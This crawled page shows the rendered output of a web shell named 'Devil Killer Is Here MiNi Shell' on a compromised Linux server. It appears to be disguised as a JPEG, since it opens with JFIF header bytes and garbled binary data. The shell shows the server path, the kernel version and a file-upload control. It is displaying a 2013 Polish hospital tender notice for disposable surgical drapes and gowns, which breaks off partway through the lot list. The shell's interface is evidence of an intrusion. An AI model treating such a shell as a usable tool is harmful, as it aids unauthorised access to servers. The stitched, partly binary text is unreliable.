JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130930/200031-N-2013.html

<p class="kh_header"><b>Olsztyn: Przetarg nieograniczony na dostawę obłożeń operacyjnych i odzieży ochronnej jednorazowego użytku NZP-51/09/13.</b><br>
<b>Numer ogłoszenia: 200031 - 2013; data zamieszczenia: 30.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Ministerstwa Spraw Wewnętrznych z Warmińsko-Mazurskim Centrum Onkologii w Olsztynie , al. Wojska Polskiego 37, 10-228 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5398218; 89 5398297, faks 89 5398218; 89 5398297.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poliklinika.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na dostawę obłożeń operacyjnych i odzieży ochronnej jednorazowego użytku NZP-51/09/13..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmot zamówienia stanowi dostawa obłożeń operacyjnych i odzieży ochronnej jednorazowego użytku. Zamówienie podzielono na 13 pakietów. Dopuszcza się składanie ofert częściowych na każdy z pakietów. 
****
Pakiet 1 - Sterylny uniwersalny zestaw obłożeń operacyjnych jednorazowego użytku z akcesoriami 1. Zestaw uniwersalny: 3500 szt. 2. Sterylne obłożenie stolika MAYO: 200 szt. 3. Sterylna taśma samoprzylepna:  1000 szt. Pakiet 2 -Sterylne uniwersalne zestawy obłożeń operacyjnych jednorazowego użytku 1. Zestaw urologiczny TUR: 200 szt. 2. Zestaw artroskopowy: 200 szt. 3. Zestaw do zabiegów na stawie biodrowym: 300 szt. 4. Zestaw do zabiegów ginekologicznych: 100  szt. Pakiet 3 - Serwety operacyjne jednorazowego użytku 1. Sterylna serweta z taśmą samoprzylepną na dłuższym boku: 1000 szt. 2. Sterylna serweta z taśmą samoprzylepną na dłuższym boku: 6000 szt. 3. Sterylna serweta z taśmą samoprzylepną: 2000 szt. 4. Sterylna serweta z otworem: 200 szt. 5. Sterylna serweta z otworem otoczonym taśmą: 2500 szt. 6. Sterylna serweta z  otworem otoczonym taśmą: 2100 szt. Pakiet 4 - Sterylna odzież ochronna jednorazowego użytku 1. Fartuch chirurgiczny włókninowy, pełnobarierowy, jałowy: 1500 szt. 2. Fartuch chirurgiczny włókninowy jałowy: 1000 szt. Pakiet 5 - Niesterylna odzież ochronna jednorazowego użytku 1. Czepek chirurgiczny, damski: 11000 szt. 2. Czepek chirurgiczny męski: 3000 szt. 3. Czepek chirurgiczny uniwersalny o kroju furażerki: 10000 szt. 4. Fartuch włókninowy: 45000 szt. 5. Maska higieniczna trójwarstwowa: 10000 szt. 6. Maska chirurgiczna trójwarstwowa, pełno barierowa: 12000 szt. 7. Maska chirurgiczna trójwarstwowa, pełno barierowa: 55000 szt. 8. Ubranie chirurgiczne męskie: 3000 szt. 9. Maska do pracy z cytostatykami: 1600 szt. Pakiet 6 - Koszule i spodnie do zabiegów operacyjnych 1. Koszule do zabiegów operacyjnych: 6000 szt. 2. Spodnie dla pacjentów do kolonoskopii: 1200 szt. Pakiet 7 - Pokrowce higieniczne na buty 1. Pokrowce na buty: 4000 szt. Pakiet 8 - Sterylne osłony jednorazowe 1. Sterylna osłona chirurgiczna na kończynę: 150 szt. 2. Sterylny pokrowiec na kamerę do artroskopii lub laparoskopii: 800 szt. 3. Sterylna kieszeń samoprzylepna: 2000 szt. 4. Sterylny zarękawek chirurgiczny: 600 szt. 5. Osłona na aparat RTG: 350 szt. Pakiet 9 - Sterylne folie chirurgiczne 1. Sterylna folia chirurgiczna: 650 szt. 2. Sterylna folia chirurgiczna: 200 szt. 3. Sterylna folia chirurgiczna: 300 szt. 4. Sterylna folia chirurgiczna: 650 szt. Pakiet 10 - Niesterylny asortyment jednorazowego użytku 1. Fartuch ochronny, foliowy w roli: 40000 szt. 2. Podkład nieprzemakalny w roli perforowanej: 40000 szt. 3. Podkład nieprzemakalny w roli perforowanej: 10000 szt. Pakiet 11 - Niesterylne prześcieradła higieniczne 1. Prześcieradło higieniczne: 22000 szt. Pakiet 12 - Niesterylne poszwy i pościel 1. Poszwa włókninowa: 100 szt. 2. Komplet pościeli z włókniny: 60 Kplt. Pakiet 13 - Obłożenia operacyjne wysokiego ryzyka 1. Barierowy zestaw wysokiego ryzyka do zabiegów endoprotezoplastyki stawu biodrowego: 40 szt. 2. Barierowy zestaw wysokiego ryzyka do zabiegów endoprotezoplastyki stawu kolanowego: 20 szt. 3. Serweta zabiegowa do chirurgii stawu barkowego: 20 szt. 4. Osłona na kończynę górną: 20 szt. 5. Serweta izolacyjna: 24 szt. 6. Serweta do procedur rewizyjnych: 20 szt. 7. Serweta główna do procedur zabiegów stawu biodrowego: 28 szt. 8. Dwukomorowa osłona dla instrumentarium pomocniczego: 20 szt. 9. Dwukomorowa osłona dla instrumentarium oraz diatermii: 20 szt. 10. Bariera Mikrobiologiczna do procedur endoprotezoplastyki stawu biodrowego: 40 szt. 11. Bariera Mikrobiologiczna do procedur endoprotezoplastyki stawu kolanowego: 20 szt. 12. Bariera Mikrobiologiczna do procedur endoprotezoplastyki stawu barkowego: 20 szt. 13. Fartuch chirurgiczny: 400 szt. 14. Fartuch chirurgiczny do zabiegów wysokiego ryzyka: 500 szt. 15. Osłona oczu do zabiegów endoprotezo plastyki: 300 szt. 16. Chirurgiczna osłona twarzy do zabiegów endoprotezo plastyki: 300 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1, 33.14.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 13.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający oceni czy Wykonawca spełnia warunki udziału w postępowaniu na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Dokumenty potwierdzające, iż oferowany wyrób medyczny spełnia wymagania zasadnicze określone dla tego wyrobu we właściwych przepisach, jest oznaczony znakiem CE oraz jest dopuszczony do obrotu i używania na terytorium RP zgodnie z Ustawą o wyrobach medycznych z dnia 20 maja 2010 r. tj.: Deklaracja zgodności EC oraz dodatkowo Certyfikat CE - w przypadku, gdy ze względu na klasę wyrobu medycznego przeprowadzenie procedury oceny zgodności nastąpiło przy udziale jednostki notyfikowanej. Zgłoszenie wyrobu medycznego do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych lub powiadomienie Prezesa Urzędu lub inny dokument potwierdzający przeniesienie do bazy danych prowadzonej przez Prezesa Urzędu danych dotyczących wyrobu medycznego objętego wpisem do rejestru - o ile taki obowiązek istnieje. 2) Dokument potwierdzający zgodność oferowanego asortymentu z normą PN EN 13795: 1, 2, 3 - dotyczy Pakiet nr 1 poz. 1 i poz. 2, Pakiet nr 2 poz. 1 - 4, Pakiet nr 3 poz. 1- 6, Pakiet nr 4 poz. 1 - 2, Pakiet nr 13 poz. 1-3, poz. 13 -14. 3) Karta techniczna materiałów/ włóknin/produktu - dotyczy Pakiet nr 1 poz. 1 i poz. 2, Pakiet nr 2 poz. 1 - 4,  Pakiet nr 3 poz. 1 - 6, Pakiet 4 poz. 1 i poz. 2, Pakiet nr 11, Pakiet nr 12 poz. 2, Pakiet nr 13 poz. 1 - 3, 13- 16. 4) Dokument opisowy dotyczący zaoferowanego produktu (np.: katalog, ulotka informacyjna). 5) Próbki oferowanego asortymentu w Pakiecie 5 poz. 1, 2, 3, 8, w Pakiecie 6 poz. 1, w Pakiecie 8 poz. 5, w Pakiecie 11.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Określa Specyfikacja Istotnych Warunków Zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poliklinika.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej Ministerstwa Spraw Wewnętrznych z Warmińsko-Mazusrkim Centrum Onkologii w Olsztynie, Wojska Polskiego 37, 10-228 Olsztyn,Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 11:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej Ministerstwa Spraw Wewnętrznych z Warmińsko-Mazusrkim Centrum Onkologii w Olsztynie,ul. Wojska Polskiego 37, 10-228 Olsztyn, Kancelaria..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1 - Sterylny uniwersalny zestaw obłożeń operacyjnych jednorazowego użytku z akcesoriami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw uniwersalny: 3500 szt. 2. Sterylne obłożenie stolika MAYO: 200 szt. 3. Sterylna taśma samoprzylepna:  1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2 - Sterylne uniwersalne zestawy obłożeń operacyjnych jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zestaw urologiczny TUR: 200 szt. 2. Zestaw artroskopowy: 200 szt. 3. Zestaw do zabiegów na stawie biodrowym: 300 szt. 4. Zestaw do zabiegów ginekologicznych: 100  szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3 - Serwety operacyjne jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sterylna serweta z taśmą samoprzylepną na dłuższym boku: 1000 szt. 2. Sterylna serweta z taśmą samoprzylepną na dłuższym boku: 6000 szt. 3. Sterylna serweta z taśmą samoprzylepną: 2000 szt. 4. Sterylna serweta z otworem: 200 szt.
5. Sterylna serweta z otworem otoczonym taśmą: 2500 szt. 6. Sterylna serweta z  otworem otoczonym taśmą: 2100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 - Sterylna odzież ochronna jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Fartuch chirurgiczny włókninowy, pełnobarierowy, jałowy: 1500 szt. 
2. Fartuch chirurgiczny włókninowy jałowy: 1000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 - Niesterylna odzież ochronna jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Czepek chirurgiczny, damski: 11000 szt. 2. Czepek chirurgiczny męski: 3000 szt. 3. Czepek chirurgiczny uniwersalny o kroju furażerki: 10000 szt. 4. Fartuch włókninowy: 45000 szt. 5. Maska higieniczna trójwarstwowa: 10000 szt. 6. Maska chirurgiczna trójwarstwowa, pełno barierowa: 12000 szt. 7. Maska chirurgiczna trójwarstwowa, pełnobarierowa: 55000 szt. 8. Ubranie chirurgiczne męskie: 3000 szt. 9. Maska do pracy z cytostatykami: 1600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 - Koszule i spodnie do zabiegów operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Koszule do zabiegów operacyjnych: 6000 szt. 2. Spodnie dla pacjentów do kolonoskopii: 1200 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7 - Pokrowce higieniczne na buty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pokrowce na buty: 4000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 - Sterylne osłony jednorazowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sterylna osłona chirurgiczna na kończynę: 150 szt. 2. Sterylny pokrowiec na kamerę do artroskopii lub laparoskopii: 800 szt.  3. Sterylna kieszeń samoprzylepna: 2000 szt. 4. Sterylny zarękawek chirurgiczny: 600 szt. 5. Osłona na aparat RTG: 350 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 - Sterylne folie chirurgiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sterylna folia chirurgiczna: 650 szt. 2. Sterylna folia chirurgiczna: 200 szt. 3. Sterylna folia chirurgiczna: 300 szt. 4. Sterylna folia chirurgiczna: 650 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10 - Niesterylny asortyment jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Fartuch ochronny, foliowy w roli: 40000 szt. 2. Podkład nieprzemakalny w roli perforowanej: 40000 szt. 3. Podkład nieprzemakalny w roli perforowanej: 10000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
